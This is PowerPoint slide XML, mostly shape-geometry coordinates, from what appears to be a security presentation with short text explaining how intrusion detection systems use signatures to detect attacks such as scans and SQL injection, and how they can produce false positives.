                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="1947926" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1944369" y="1650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941829" y="8255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943480" y="11937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946782" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007290" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951227" y="1143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194792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FD74A26D-E4E5-553E-4741-50F1E88DBD8D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="441578" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388540" y="13747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157104" y="423219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137447" y="389501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112375" y="354161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84077" y="320581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="348488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28632" y="358374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227393" y="433165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254000" y="367538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282670" y="304784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313054" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="187451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378205" y="133731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412861" y="82423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451739" y="29209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453390" y="26288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455295" y="21208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44157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FAFE599C-A7F5-0B3A-5A04-176CE41A586B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="436499" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441578" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449833" y="3809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="14858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449325" y="32257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430873" y="57185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395301" y="107946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361489" y="160162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328914" y="215598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297648" y="274365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268120" y="335845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240399" y="399946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203073" y="502031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202056" y="504951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187578" y="512190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184530" y="512952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180975" y="513461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177165" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169545" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165607" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149225" y="512571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128609" y="486078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114460" y="466127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="456056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101004" y="446031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37385" y="367664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9905" y="338708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5969" y="333882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="319531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6096" y="306450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10159" y="303021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14477" y="300355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19303" y="298450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24002" y="296544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="295275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34035" y="294386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39116" y="293624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47117" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59308" y="296418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62356" y="298576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98583" y="337073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="371856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148002" y="406622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382835" y="19962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418766" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9144">
              <a:solidFill>
                <a:srgbClr val="243355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2D14451F-30D7-B4E5-1B6C-C5004520D931}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5001641" y="2913506"/>
              <a:ext cx="2915285" cy="1573530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2664206" y="1473327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661539" y="1471129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657475" y="1471574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653157" y="1477048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653538" y="1481048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656332" y="1483233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706852" y="1523733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="1121854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="1134427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2704896" y="1536293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641600" y="1561617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639949" y="1565313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641346" y="1568577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642616" y="1571828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646299" y="1573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730436" y="1539748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2915158" y="27813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2904350" y="24765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819781" y="889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="1905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811907" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811018" y="8636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="12192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2878569" y="30695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="775843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="788162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2881807" y="42989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="91059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="95123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2838323" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842387" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844800" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915158" y="2781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8277B1B0-0E8B-D308-24B0-BC1D61FD16E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877183"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="447802" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447802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13FC6518-79E6-FBCC-7F7A-D19E40D0D1C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6582791" y="4458665"/>
              <a:ext cx="61594" cy="88265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="61595" h="88264">
                  <a:moveTo>
                    <a:pt x="61086" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4063" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61086" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CD111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3886EF29-7721-D531-C014-34836D0F28AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877183"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="492252" y="669658"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496315" y="607250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482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3766A79C-D619-D265-678D-D23FF3CD0DC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300216" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="69469" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469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1E9ADAB4-39B2-C430-5C3D-C4F4E83B1877}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6652641" y="3499866"/>
              <a:ext cx="80010" cy="61594"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="80009" h="61595">
                  <a:moveTo>
                    <a:pt x="79501" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21208" y="6984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="61594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795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F9609EE2-6410-1F26-CEF3-3280994E304B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300216" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="352425" y="592963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="373634" y="538352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25399">
              <a:solidFill>
                <a:srgbClr val="2C2C2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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19686E9-E10E-7CFD-B7F8-04E444115F31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418610" y="4319995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IDS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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5EB4A4-D6B2-2D44-B960-6D0D888A3F6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33233" y="4097351"/>
            <a:ext cx="551560" cy="477621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7F89702-7133-3193-0B5B-7205FC5695C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158893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0" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A194C484-9DFB-430A-A87D-D80A324C64E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158893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112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2508304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3453327-425B-1519-77B0-DB92150D7CA1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6533FD-3F05-E5A2-45EF-309DB49E244A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IDS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056AC51-88E1-E219-B0EC-105B3747886F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B888A4D-A83D-65A2-55AA-70533B1E3A79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113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8ECD471-7CD3-6582-DDBC-9CAD2E333C03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1446594"/>
            <a:ext cx="8054975" cy="273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1885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IDS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specialized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software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detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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ongoing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intrusions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checks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attack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vectors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like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ping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sweeps,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scans,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SQL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injections,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buffer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overflows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on.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IDS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also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identify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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traffic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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generated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virus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worm.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Pretty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much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every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kind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threat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detected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well-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configured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IDS.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4750402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A5DA808-5659-DF11-C440-BD4348159EFF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A9C1399-5154-7A89-CD89-67B98F031C02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IDS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D1A9E1E-492A-9AAB-D1D2-F8473FF8B42E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A1C94BB-C5BA-FDCF-ABC3-D8CB1C58A03E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114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AA3156E-8BAB-BECC-E417-E7337327AA69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1209156"/>
            <a:ext cx="7964170" cy="31724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IDS,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like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antivirus,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detects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risky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traffic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means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of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signatures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vendor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provides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frequent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signature updates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soon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new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attack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vectors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found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wild.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Without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right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signatures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IDS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cannot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detect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and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report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intrusion;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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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cannot</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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something</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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if</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>it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does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400" b="1" spc="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already</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="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know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2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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There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also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false</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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positives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They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happen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when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legit</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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traffic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flagged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malicious.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2730635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54DDA7B-37E7-4730-766C-300213E8E342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431343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5C3531B-D1AF-50D4-139E-BF3215C2349B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
